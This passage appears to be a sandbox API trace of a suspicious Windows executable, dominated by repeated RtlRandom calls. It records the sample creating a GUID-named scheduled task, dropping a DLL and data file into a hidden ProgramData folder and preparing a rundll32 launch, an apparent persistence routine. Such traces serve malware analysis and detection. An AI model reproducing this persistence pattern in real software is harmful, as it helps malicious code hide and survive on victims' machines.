0x64ab079f [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x32f26e40 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x56fa560b [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4c9b789f [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1f2e5ec9 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1fc8a22b [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x32a1b7a1 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x32eac016 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3abbf1ef [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x55037da6 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x56f5f138 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x456a57da [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x487684d6 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4d51e5e8 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5c2e998b [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5343fb3c [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3dce0c0a [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7cf016d1 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7c5fb05b [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x232eb293 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x721dafd1 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5bf366b3 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2f04b505 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x14a3e56c [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x498381e6 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5048756e [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4f66059 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7a225cb5 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x518a2e3 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x45b027d5 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0xfc4eeeb [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x206feedc [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2234bdb0 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x45c2e8bf [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2cec58cd [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x404237fd [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x22a095e9 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7b13c3b4 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5d06e7f3 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x50fa4384 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x35957e54 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x702a9526 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x64d86cec [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x47d1f4ac [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x39b34f40 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x417441d1 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x466edb6f [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1b1d3781 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0xa706bce [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0xf1b0f4d [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5a0c44de [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x704d9846 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6209fcbe [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4ad55b19 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7160d02b [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4503b503 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x675c4167 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4d4b380d [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1f6d0078 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x55f78a6e [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4acfd123 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x42f7aadb [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1f51ec7 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x68c8aa52 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3f97f40e [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x62f88e20 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x57dffd4d [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6452f8a5 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1cfd9671 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3689667c [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7f989d6b [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2afa58d1 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x48b2b7ac [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2c3c583c [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x497efc3b [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x43c3227d [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0xf125de5 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x165c6ed2 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4d96a6b6 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5332f533 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x57235125 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4967b530 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x51e639b [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x253361e6 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x72cfccdb [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x50cb0b75 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4c7e595a [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x50c2cb5d [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4293e576 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2a1ac41d [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x47b29fcb [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x38c74140 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4fb40b7d [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x76bebd62 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x17fd4f18 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x30f26b49 [0089.083] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1f6e60e0 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1e729a66 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4b90bc96 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3ce894df [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7c50e654 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4cfc45fc [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4cf5349f [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x56638786 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x66569dfa [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1d9cfe71 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5a448aa6 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2edb5441 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x90b6d61 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6bff18bd [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x624a2634 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1e3f6196 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x16f91306 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5e5b976 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3f00b7c1 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x513bd09d [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x71e6b56a [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x53ace853 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7ad38d7c [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4ac01712 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2b9e03ff [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4212cac2 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x55acf812 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7459775d [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5fefe621 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x365c9610 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3ebf7ef8 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6b9f46b2 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1b69400d [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2585b1da [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2307a64 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x48273bc5 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4146ce34 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x47420fb0 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5d792440 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0xdaa52be [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7ab20b4a [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x27fd9f44 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x603cd8b6 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x51a7aa06 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x26e98e2c [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2f9bdf70 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x26d4f4af [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x777ed327 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x585f99fe [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x276e1ca2 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5de95bf5 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x40fa84dc [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4710e42f [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4a7dd55e [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x65b9ae61 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x78ccca9d [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7a4a7a4f [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x643be2c9 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x364a0945 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5fde8ef9 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6f4897ae [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5c981e98 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2a390530 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0xe2d4492 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x358ea4a2 [0089.084] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x60227684 [0089.085] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x63273f80 [0089.085] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5fb841de [0089.085] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x63b12c81 [0089.085] WriteFile (in: hFile=0x25c, lpBuffer=0x59ffa34*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x59ff600, lpOverlapped=0x0 | out: lpBuffer=0x59ffa34*, lpNumberOfBytesWritten=0x59ff600*=0x400, lpOverlapped=0x0) returned 1 [0089.086] CloseHandle (hObject=0x25c) returned 1 [0089.086] CoInitialize (pvReserved=0x0) returned 0x0 [0089.087] CoCreateInstance (in: rclsid=0x1c95110*(Data1=0x148bd52a, Data2=0xa2ab, Data3=0x11ce, Data4=([0]=0xb1, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x53, [6]=0x5, [7]=0x3)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1c950f0*(Data1=0x148bd527, Data2=0xa2ab, Data3=0x11ce, Data4=([0]=0xb1, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x53, [6]=0x5, [7]=0x3)), ppv=0x261b610 | out: ppv=0x261b610*=0x2620d18) returned 0x0 [0089.133] CoCreateGuid (in: pguid=0x59ff7f0 | out: pguid=0x59ff7f0*(Data1=0x407dad5a, Data2=0xb5c6, Data3=0x4985, Data4=([0]=0x98, [1]=0x78, [2]=0xa3, [3]=0x75, [4]=0x32, [5]=0xf9, [6]=0xa5, [7]=0x5f))) returned 0x0 [0089.133] _snprintf (in: _Dest=0x59ff740, _Count=0x78, _Format="%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" | out: _Dest="407dad5a-b5c6-4985-9878-a37532f9a55f") returned 36 [0089.133] strlen (_Str="407dad5a-b5c6-4985-9878-a37532f9a55f") returned 0x24 [0089.135] ITaskScheduler:Delete (This=0x2620d18, pwszName="407dad5a-b5c6-4985-9878-a37532f9a55f") returned 0x80070002 [0089.136] ITaskScheduler:NewWorkItem (in: This=0x2620d18, pwszTaskName="407dad5a-b5c6-4985-9878-a37532f9a55f", rclsid=0x1c95100*(Data1=0x148bd520, Data2=0xa2ab, Data3=0x11ce, Data4=([0]=0xb1, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x53, [6]=0x5, [7]=0x3)), riid=0x1c950e0*(Data1=0x148bd524, Data2=0xa2ab, Data3=0x11ce, Data4=([0]=0xb1, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x53, [6]=0x5, [7]=0x3)), ppUnk=0x261b614 | out: ppUnk=0x261b614*=0x2601c78) returned 0x0 [0089.137] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x59ffa20, nSize=0x207 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pst790mv.exe")) returned 0x3d [0089.137] GetSystemDirectoryW (in: lpBuffer=0x59ff818, uSize=0x103 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0089.137] IUnknown:QueryInterface (in: This=0x2601c78, riid=0x1c95314*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x59ffe70 | out: ppvObject=0x59ffe70*=0x2601c7c) returned 0x0 [0089.137] IPersistFile:Save (This=0x2601c7c, pszFileName=0x0, fRemember=1) returned 0x0 [0089.327] IUnknown:Release (This=0x2601c7c) returned 0x1 [0089.327] strlen (_Str="core") returned 0x4 [0089.327] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2621344) returned 1 [0089.327] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x7530) returned 0x0 [0089.379] CloseHandle (hObject=0x2a4) returned 1 [0089.379] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0xffffffff) returned 0x0 [0089.379] CloseHandle (hObject=0x2e4) returned 1 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3ec3b110 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6ece0b1e [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x44afc977 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x63c1bc20 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4ef38a2 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1fbe1cf1 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x46e37ed7 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x26047a63 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1d0b7a9f [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6024566f [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7000b3a4 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3b30c179 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2c9ca550 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x62b9264d [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x100c66fb [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x47623575 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1f8d2e53 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3c61f1a5 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1b531abd [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x212baa9b [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x55d488fe [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x552aa96a [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2f32847a [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x355084e8 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3262848f [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x45157e57 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x39674398 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4dba978a [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5c97e904 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x49c8bbf6 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x49fb73b3 [0089.379] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3c90c270 [0089.380] CreateFileW (lpFileName="C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\1.dat" (normalized: "c:\\programdata\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\1.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e4 [0089.380] WriteFile (in: hFile=0x2e4, lpBuffer=0x59ffe00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x59ffddc, lpOverlapped=0x0 | out: lpBuffer=0x59ffe00*, lpNumberOfBytesWritten=0x59ffddc*=0x20, lpOverlapped=0x0) returned 1 [0089.381] CloseHandle (hObject=0x2e4) returned 1 [0089.383] WriteFile (in: hFile=0x2e4, lpBuffer=0x5a00048*, nNumberOfBytesToWrite=0x76000, lpNumberOfBytesWritten=0x59ffddc, lpOverlapped=0x0 | out: lpBuffer=0x5a00048*, lpNumberOfBytesWritten=0x59ffddc*=0x76000, lpOverlapped=0x0) returned 1 [0089.388] CloseHandle (hObject=0x2e4) returned 1 [0089.389] CreateFileW (lpFileName="C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll" (normalized: "c:\\programdata\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e4 [0089.389] WriteFile (in: hFile=0x2e4, lpBuffer=0x2670f50*, nNumberOfBytesToWrite=0x21400, lpNumberOfBytesWritten=0x59ffe68, lpOverlapped=0x0 | out: lpBuffer=0x2670f50*, lpNumberOfBytesWritten=0x59ffe68*=0x21400, lpOverlapped=0x0) returned 1 [0089.391] CloseHandle (hObject=0x2e4) returned 1 [0089.395] WriteFile (in: hFile=0x2e4, lpBuffer=0x1c96000*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x59ffdf0, lpOverlapped=0x0 | out: lpBuffer=0x1c96000*, lpNumberOfBytesWritten=0x59ffdf0*=0x2200, lpOverlapped=0x0) returned 1 [0089.396] CloseHandle (hObject=0x2e4) returned 1 [0089.396] WriteFile (in: hFile=0x2e4, lpBuffer=0x2620b18*, nNumberOfBytesToWrite=0xb2, lpNumberOfBytesWritten=0x59ffdf0, lpOverlapped=0x0 | out: lpBuffer=0x2620b18*, lpNumberOfBytesWritten=0x59ffdf0*=0xb2, lpOverlapped=0x0) returned 1 [0089.397] CloseHandle (hObject=0x2e4) returned 1 [0089.397] wcslen (_String="rundll32.exe ") returned 0xd [0089.397] wcslen (_String="C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll") returned 0x5c [0089.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0089.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll", cchWideChar=92, lpMultiByteStr=0x26270c8, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll", lpUsedDefaultChar=0x0) returned 92 [0089.397] strlen (_Str="core.installed_file") returned 0x13 [0089.397] strlen (_Str="core") returned 0x4 [0089.397] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2621344) returned 1 [0089.397] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x7530) returned 0x0 [0089.405] CloseHandle (hObject=0x2a4) returned 1 [0089.405] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0xffffffff) returned 0x0 [0089.405] CloseHandle (hObject=0x2e4) returned 1 [0089.405] strlen (_Str="core.installed") returned 0xe [0089.405] strlen (_Str="core") returned 0x4 [0089.405] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x262130c) returned 1 [0089.405] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x7530) returned 0x0 [0089.413] CloseHandle (hObject=0x2a4) returned 1 [0089.413] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0xffffffff) returned 0x0 [0089.413] CloseHandle (hObject=0x2e4) returned 1 [0089.413] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x59ffe70 | out: lpSystemTimeAsFileTime=0x59ffe70*(dwLowDateTime=0x2e1e2ea0, dwHighDateTime=0x1d357fe)) [0089.413] strlen (_Str="core.install_time") returned 0x11 [0089.413] strlen (_Str="core") returned 0x4 [0089.413] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, 